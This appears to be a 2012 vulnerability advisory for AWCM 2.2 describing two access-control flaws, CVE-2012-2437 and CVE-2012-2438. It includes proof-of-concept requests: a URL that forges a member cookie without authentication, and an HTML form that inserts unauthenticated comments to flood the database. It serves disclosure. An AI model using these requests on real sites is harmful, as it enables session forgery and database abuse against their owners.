Home / exploits AWCM 2.2 Access Bypass
Posted on 09 November 2012
Vulnerability Report AWCM 2.2 CVE-Candidate-ID: CVE-2012-2437, CVE-2012-2438 Issue: Access Control Bug in AWCM 2.2, Anyone can build the cookie and inserts DB records. Author: Sooel Son [sonpostman (at) gmail (dot) com] Source Code: http://sourceforge.net/projects/awcm/ 1. Details: CVE-2012-2437 Without going through an authentication procedure, anyone can forge a cookie, the pairs of key and value. Proof of Concept Code: Initiate the following URL request. http://targethost/awcm/cookie_gen.php?name='key'&content='value' ex) http://targethost/awcm/cookie_gen.php? name=awcm_member&content=123456 2. Details CVE-2012-2438 There is no access control protection for adversaries to insert millions of comment records on the database on show_video.php and topic.php. Proof of Concept Code: [form action="http://targethost/awcm/show_video.php?coment=exploit" method="post"] [input type="hidden" name="coment" value='insert uninvited comments 2' /] [input type="submit" value="Submit"] </form> ########################## Vendor Notification * Nov 5th: Acknowledge the vendors, but no responses.
